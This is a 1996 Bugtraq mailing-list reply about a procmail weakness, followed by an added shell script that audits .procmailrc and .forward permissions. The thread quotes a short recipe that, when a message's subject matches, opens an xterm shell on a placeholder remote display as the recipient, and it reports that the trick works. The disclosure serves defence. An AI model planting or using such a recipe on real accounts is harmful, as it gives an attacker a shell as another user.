Bugtraq mailing list archives

Re: procmail


From: ming () math uh edu (James Wang)
Date: Tue, 6 Aug 1996 17:58:29 -0500


On Tue, 6 Aug 1996, Neil Soveran-Charley wrote:

   I think there may well be such an exploit. I'd guess it is simply
 something like:

(.procmailrc contents)

:0 Hc
* ^Subject:.*APassword
/usr/bin/X11/xterm -display <some display> -e <a shell>

(end .procmailrc)

        I tried it with a different user account than mine and it does work.
        It shows the owner as the person receiving the mail.

        It needed a | in-front of /usr/bin/X11/xterm .....

        It might work with just the command in .forward.  So, it might not be
only procmail's problem.  One must make sure his/her .procmailrc and
.forward are not world writable.


  I'm sure procmail MUST have some security feature to disallow this
sort of thing? But I could be wrong, and haven't checked the manual
pages yet.

        No.  Since there is no way for procmail to know beforehand what
kind of program you might use.
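A defender's check for the point made above (keep .procmailrc and .forward from being writable by anyone but the owner), as an added example that is not part of the thread: a POSIX sh script that flags delivery files that are group- or world-writable or not owned by the account, and a world-writable home directory. The home path and owner name are passed in; the scratch "home" at the end is constructed for the demo.

```shell
#!/bin/sh
# Why: procmail runs whatever a recipe names, so a .procmailrc (or .forward)
# that someone else can write lets them run commands as the mailbox owner the
# next time a matching message is delivered. These checks report that exposure.

# has_perm FILE MODEBITS   -> true when FILE has all of MODEBITS set (e.g. o+w)
has_perm() {
    [ -n "$(find "$1" -prune -perm -"$2" -print 2>/dev/null)" ]
}

# not_owned_by FILE USER   -> true when FILE is not owned by USER
not_owned_by() {
    [ -n "$(find "$1" -prune ! -user "$2" -print 2>/dev/null)" ]
}

# check_delivery_files HOME_DIR OWNER
# Prints one finding per line; prints nothing when the files look sane.
check_delivery_files() {
    home="$1"
    owner="$2"
    # A world-writable home lets anyone create or replace the files outright.
    if has_perm "$home" o+w; then
        echo "$home: home directory is world-writable"
    fi
    for name in .procmailrc .forward; do
        f="$home/$name"
        [ -e "$f" ] || continue
        if has_perm "$f" o+w; then echo "$f: world-writable"; fi
        if has_perm "$f" g+w; then echo "$f: group-writable"; fi
        if not_owned_by "$f" "$owner"; then echo "$f: not owned by $owner"; fi
    done
}

# count_findings HOME_DIR OWNER -> number of findings (0 when clean)
count_findings() {
    check_delivery_files "$1" "$2" | grep -c . || true
}

# Constructed demo: a scratch home with a loose .procmailrc and a tight .forward.
demo_home=$(mktemp -d)
printf ':0:\n* ^Subject:.*list\nlists-folder\n' > "$demo_home/.procmailrc"
chmod 666 "$demo_home/.procmailrc"          # the unsafe case from the thread
printf '\\%s\n' "$(id -un)" > "$demo_home/.forward"
chmod 600 "$demo_home/.forward"             # owner-only, as it should be
check_delivery_files "$demo_home" "$(id -un)"
rm -rf "$demo_home"
```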


